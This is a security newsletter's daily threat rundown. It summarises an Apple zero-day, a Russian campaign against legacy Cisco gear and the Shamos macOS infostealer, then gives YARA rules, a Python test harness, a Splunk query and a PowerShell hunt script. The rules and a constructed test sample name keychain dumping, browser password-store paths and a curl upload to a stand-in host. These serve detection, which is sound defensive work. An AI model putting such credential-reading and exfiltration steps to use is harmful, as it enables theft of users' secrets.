The Apple zero-day currently appears to be a targeted effort, and older OT equipment remains under attack. Both are developing stories as we head into the weekend. Here's a detailed look at the current cybersecurity landscape for Saturday, August 23, 2025.
Date & Time: 2025-08-22T14:07:56
A new Apple zero-day vulnerability, identified as CVE-2025-43300, is being actively exploited in the wild. The attacks are described as sophisticated and targeted against specific individuals, suggesting potential use by nation-state actors or for deploying advanced spyware. Organizations with high-profile users should prioritize immediate patching and threat hunting activities.
CVE Details: CVE-2025-43300
Source: Dark Reading
Date & Time: 2025-08-22T13:00:00
The FBI has issued an alert warning that Russia-backed threat actors are infiltrating critical infrastructure networks by exploiting a known, older Cisco vulnerability. This campaign highlights the significant risk posed by unpatched legacy equipment in operational technology (OT) environments. Asset owners in critical sectors must audit their networks for this flaw and implement immediate mitigation measures to prevent potential disruption.
CVE Details: n/a
Source: Tenable
Date & Time: 2025-08-23T13:17:51
A new information-stealing malware named 'Shamos' is targeting macOS users through social engineering attacks. The malware, a variant of the Atomic macOS Stealer (AMOS), is distributed through malicious websites impersonating troubleshooting guides that trick users into running a malicious script. This threat underscores the growing trend of sophisticated malware targeting the Apple ecosystem, requiring heightened user awareness and endpoint protection.
CVE Details: n/a
Source: Lifeboat
Date & Time: 2025-08-22T19:47:24
New analysis from Lumia Security indicates that Apple's AI features are collecting a broader range of personal data than previously understood, including location information and encrypted messages. While not a direct vulnerability, this extensive data collection raises significant privacy concerns and increases the potential impact of a future data breach. Security leaders should review corporate policies regarding the use of such features on company devices.
CVE Details: n/a
Source: Dark Reading
Date & Time: 2025-08-22T18:37:39
The U.S. Federal Trade Commission has issued a stern warning to companies against weakening their data security or censorship standards at the behest of foreign powers. This policy statement places a clear expectation on U.S. companies to prioritize the security of American user data, even when faced with pressure from international markets. Executives and legal counsel should review this guidance to ensure their global operations and data handling policies align with FTC expectations, as non-compliance could lead to significant regulatory action.
Source: FTC.gov, Hacker News Discussion
Spotlight Rationale: Tenable is selected due to their direct reporting on the FBI alert concerning Russian hackers exploiting a legacy Cisco vulnerability in industrial systems. This threat directly aligns with Tenable's core competency in exposure and vulnerability management, making their platform highly relevant for identifying and mitigating such risks.
Threat Context: Cybersecurity Snapshot: Industrial Systems in Crosshairs of Russian Hackers
Platform Focus: Tenable (Nessus, Tenable.io, Tenable.ot)
Tenable's suite of products provides comprehensive vulnerability scanning and asset management crucial for defending against the threats highlighted today. Their platforms can identify outdated and vulnerable devices, such as the Cisco hardware mentioned in the FBI alert, across both IT and OT environments. By providing a unified view of the attack surface, Tenable enables organizations to prioritize patching for critical vulnerabilities like CVE-2025-43300 and legacy bugs before they can be exploited by threat actors.
Actionable Platform Guidance: Security teams should use Tenable.io or Nessus to run authenticated scans specifically targeting their network infrastructure devices, using plugins designed to detect older, high-risk Cisco vulnerabilities. For industrial environments, Tenable.ot can be used to passively identify vulnerable assets without disrupting operations, helping to find and flag the specific devices targeted in the FBI alert.
Source: Tenable
⚠️ Disclaimer: Test all detection logic in non-production environments before deployment.
1. YARA Rules for 'Shamos' macOS Infostealer (Conceptual, then General Purpose)
rule macOS_infostealer_Shamos_variant {
    meta:
        description = "Detects potential Shamos infostealer artifacts, a variant of AMOS. This is a conceptual rule based on common infostealer behavior on macOS."
        author = "Threat Rundown"
        date = "2025-08-23"
        reference = "https://lifeboat.com/blog/2025/08/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer"
    strings:
        $keychain_access = "security find-generic-password" fullword ascii
        // No fullword on the path fragments: the character before the leading "/" is the last letter of the
        // home directory name (e.g. the "e" in /Users/jane), which is alphanumeric and would suppress the match.
        $chrome_db = "/Library/Application Support/Google/Chrome/Default/Login Data" ascii
        $firefox_db = "/Library/Application Support/Firefox/Profiles/" ascii
        $curl_upload = "curl -F 'file=@" ascii
    condition:
        // "and" binds tighter than "or": without the parentheses every 64-bit Mach-O would match with no strings at all.
        (uint32(0) == 0xfeedfacf or uint32(0) == 0xfeedface) and 2 of them
}
rule macOS_Infostealer_Gen_ShamosAMOS_File_2025_08
{
    meta:
        description = "Generic macOS infostealer traits (Keychain/Chromium/Firefox + exfil hints) — file scan"
        author = "Threat Rundown"
        date = "2025-08-23"
        confidence = "conceptual-general-purpose"
    strings:
        // Mach-O magic (64/32) and universal/fat magic, written as the bytes appear on disk
        $m1 = { CF FA ED FE } // 64-bit Mach-O, little-endian (uint32(0) == 0xfeedfacf)
        $m2 = { CE FA ED FE } // 32-bit Mach-O, little-endian (uint32(0) == 0xfeedface)
        $fat = { CA FE BA BE } // FAT/universal header, big-endian; also the Java class-file magic, hence the 3-of threshold below
        // Keychain/Apple Security API surface sometimes left in binaries
        $k1 = "kSecClassGenericPassword" ascii
        $k2 = "SecKeychainFindGenericPassword" ascii
        // Browser credential store paths (generalized home path)
        $c1 = /Users\/[^\/]+\/Library\/Application Support\/(Google\/Chrome|BraveSoftware|Microsoft Edge)\/[^\/]+\/Login Data/ ascii
        $f1 = /Users\/[^\/]+\/Library\/Application Support\/Firefox\/Profiles\/[^\/]+\.default(-release)?/ ascii
        // Exfil hints commonly hardcoded ($x1 alone fires on anything that links libcurl, so it never carries a match by itself)
        $x1 = /curl(\s|$)/ ascii nocase
        $x2 = "multipart/form-data" ascii nocase
        $x3 = "Content-Disposition: form-data; name=\"file\"; filename=" ascii nocase
    condition:
        // Anchor the declared header strings at offset 0. YARA refuses to compile a rule with unreferenced strings,
        // and uint32() reads little-endian, so "uint32(0) == 0xcafebabe" would never match the big-endian FAT header.
        ($m1 at 0 or $m2 at 0 or $fat at 0)
        and
        // Require at least 3 behavioral indicators to reduce noise
        3 of ($k*, $c*, $f*, $x*)
}
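To sanity-check the two conditions above without loading them into YARA, the following Python (an added example, not part of the rundown) reproduces YARA's uint32() byte-order semantics and the general-purpose rule's "header at offset 0 and 3 of N indicators" logic over constructed pseudo-binaries; the samples, the indicator names and the threshold are assumptions mirroring the rule.

```python
import re
import struct

# Magic values as they sit on disk (constructed byte patterns, not real samples).
MACHO64_LE = b"\xcf\xfa\xed\xfe"  # uint32(0) little-endian reads 0xfeedfacf
MACHO32_LE = b"\xce\xfa\xed\xfe"  # uint32(0) little-endian reads 0xfeedface
FAT_MAGIC = b"\xca\xfe\xba\xbe"   # stored big-endian; uint32(0) reads 0xbebafeca, not 0xcafebabe

def yara_uint32(data: bytes, offset: int = 0) -> int:
    """Same semantics as YARA's uint32(): unsigned little-endian 32-bit read."""
    return struct.unpack_from("<I", data, offset)[0]

def yara_uint32be(data: bytes, offset: int = 0) -> int:
    """Same semantics as YARA's uint32be(): unsigned big-endian 32-bit read."""
    return struct.unpack_from(">I", data, offset)[0]

# The general-purpose rule's behavioural indicators ported to Python regexes (assumed equivalents).
INDICATORS = {
    "k1": re.compile(rb"kSecClassGenericPassword"),
    "k2": re.compile(rb"SecKeychainFindGenericPassword"),
    "c1": re.compile(rb"Users/[^/]+/Library/Application Support/"
                     rb"(Google/Chrome|BraveSoftware|Microsoft Edge)/[^/]+/Login Data"),
    "f1": re.compile(rb"Users/[^/]+/Library/Application Support/Firefox/Profiles/[^/]+\.default(-release)?"),
    "x1": re.compile(rb"curl(\s|$)", re.IGNORECASE),
    "x2": re.compile(rb"multipart/form-data", re.IGNORECASE),
    "x3": re.compile(rb'Content-Disposition: form-data; name="file"; filename=', re.IGNORECASE),
}

def is_macho_or_fat(data: bytes) -> bool:
    """Raw-byte header check at offset 0, which is what '$m1 at 0' does and is byte-order safe."""
    return data[:4] in (MACHO64_LE, MACHO32_LE, FAT_MAGIC)

def matched_indicators(data: bytes) -> set:
    """Names of the indicators that hit, so an analyst can see which of the 3-of-N fired."""
    return {name for name, rx in INDICATORS.items() if rx.search(data)}

def rule_matches(data: bytes, threshold: int = 3) -> bool:
    """Python equivalent of: (magic at 0) and 3 of ($k*, $c*, $f*, $x*)."""
    return is_macho_or_fat(data) and len(matched_indicators(data)) >= threshold

# Constructed pseudo-binaries: a header plus the strings an infostealer might embed.
STEALER_LIKE = MACHO64_LE + b"\x00" * 28 + (
    b"kSecClassGenericPassword\x00"
    b"/Users/jane/Library/Application Support/Google/Chrome/Default/Login Data\x00"
    b"curl -F 'file=@/tmp/out.zip' http://example.invalid/upload\x00")
BENIGN_FAT = FAT_MAGIC + b"\x00" * 28 + b"SecKeychainFindGenericPassword\x00"  # one hint only
# Three hints but no Mach-O/FAT header: the header gate must reject it.
SCRIPT_TEXT = b"#!/bin/sh\nkSecClassGenericPassword\ncurl -F 'file=@x' -H 'Content-Type: multipart/form-data'"
```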
2. SIEM Query — Detecting Unusual Inbound Connections to Network Gear
Splunk SPL - detects potential exploitation of network devices like the Cisco bug mentioned by the FBI. SPL has no // inline comments, so the notes are kept outside the query. Replace "United States" with your own country/region. The known_corporate_ip_ranges lookup is assumed to carry a src_ip column and return a range_name field; a CSV lookup matches exact addresses only unless its transforms.conf stanza sets match_type = CIDR(src_ip), which is what a range lookup needs. The original OUTPUT clause named no field and then tested the lookup name as if it were a field, so it would never exclude anything.
(sourcetype=cisco:asa OR sourcetype=pan:traffic OR sourcetype=fortinet:ftnt_traffic)
| where dest_port IN (22, 23, 80, 443, 161)
| iplocation src_ip
| search Country!="United States"
| lookup known_corporate_ip_ranges src_ip OUTPUT range_name
| where isnull(range_name)
| stats count by src_ip, dest_ip, dest_port, Country
| table src_ip, dest_ip, dest_port, Country, count
| sort - count
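The same triage logic run offline over constructed Cisco ASA 302013 syslog lines, as an added example that is not part of the rundown; the GEO table stands in for iplocation, CORPORATE_RANGES for the corporate-range lookup, and both are assumed sample values.

```python
import ipaddress
import re
from collections import Counter

# Constructed ASA "Built ... connection" lines (message ID 302013), standing in for the sourcetypes above.
SAMPLE_LOGS = """\
%ASA-6-302013: Built inbound TCP connection 1001 for outside:192.0.2.10/51515 (192.0.2.10/51515) to inside:10.0.0.1/22 (10.0.0.1/22)
%ASA-6-302013: Built inbound TCP connection 1002 for outside:192.0.2.10/51516 (192.0.2.10/51516) to inside:10.0.0.1/22 (10.0.0.1/22)
%ASA-6-302013: Built inbound TCP connection 1003 for outside:203.0.113.7/40000 (203.0.113.7/40000) to inside:10.0.0.1/443 (10.0.0.1/443)
%ASA-6-302013: Built inbound TCP connection 1004 for outside:198.51.100.9/40001 (198.51.100.9/40001) to inside:10.0.0.2/8443 (10.0.0.2/8443)
%ASA-6-302013: Built outbound TCP connection 1005 for inside:10.0.0.3/50000 (10.0.0.3/50000) to outside:192.0.2.10/443 (192.0.2.10/443)
"""

# Stand-ins for iplocation and the known_corporate_ip_ranges lookup (constructed, not real data).
GEO = {"192.0.2.10": "Germany", "203.0.113.7": "Netherlands", "198.51.100.9": "France"}
CORPORATE_RANGES = [ipaddress.ip_network("203.0.113.0/24")]
MGMT_PORTS = {22, 23, 80, 443, 161}
HOME_COUNTRY = "United States"

BUILT_INBOUND = re.compile(
    r"Built inbound (?:TCP|UDP) connection \d+ for \w+:(?P<src>[\d.]+)/\d+ \(\S+\) "
    r"to \w+:(?P<dst>[\d.]+)/(?P<dport>\d+)")

def is_corporate(ip: str) -> bool:
    """CIDR containment: the exclusion the Splunk lookup only performs with match_type = CIDR(src_ip)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CORPORATE_RANGES)

def triage(log_text: str):
    """Python equivalent of the SPL pipeline: [((src, dst, port, country), count), ...] sorted by count."""
    counts = Counter()
    for line in log_text.splitlines():
        m = BUILT_INBOUND.search(line)
        if not m:
            continue  # outbound connections and unrelated messages
        src, dst, dport = m["src"], m["dst"], int(m["dport"])
        country = GEO.get(src, "Unknown")
        if dport not in MGMT_PORTS or country == HOME_COUNTRY or is_corporate(src):
            continue
        counts[(src, dst, dport, country)] += 1
    return sorted(counts.items(), key=lambda kv: -kv[1])
```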
3. PowerShell Script — Hunt for Lateral Movement Indicators
# Checks for common remote process execution events (Event ID 4688) that could indicate lateral movement.
# Requires "Audit Process Creation" to be enabled; the CommandLine field is only populated when
# "Include command line in process creation events" is also on. ParentProcessName (Properties[13])
# exists in 4688 events on Windows 10 / Server 2016 and later only.
$lookbackHours = 24
$startTime = (Get-Date).AddHours(-$lookbackHours)
Write-Host "Searching for potential lateral movement indicators in the last $lookbackHours hours..."
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; StartTime=$startTime} -ErrorAction SilentlyContinue | ForEach-Object {
    $processName = $_.Properties[5].Value           # NewProcessName
    $creatorProcessName = $_.Properties[13].Value   # ParentProcessName (index 12 is TargetLogonId, not the parent)
    # Look for powershell.exe, wmic.exe, PsExec or its PSEXESVC service binary being created by service hosts
    if (($processName -match 'powershell\.exe$|wmic\.exe$|psexec\.exe$|psexesvc\.exe$') -and ($creatorProcessName -match 'services\.exe$|wininit\.exe$')) {
        Write-Warning "Potential Lateral Movement Detected!"
        [PSCustomObject]@{
            Time = $_.TimeCreated
            Process = $processName
            CreatorProcess = $creatorProcessName
            CommandLine = $_.Properties[8].Value    # empty unless command-line auditing is enabled
            Computer = $_.MachineName
        }
    }
} | Format-Table
This rundown should provide a solid overview of the current threat landscape. Thank you to all our cyberheroes for your diligence and hard work. Stay vigilant!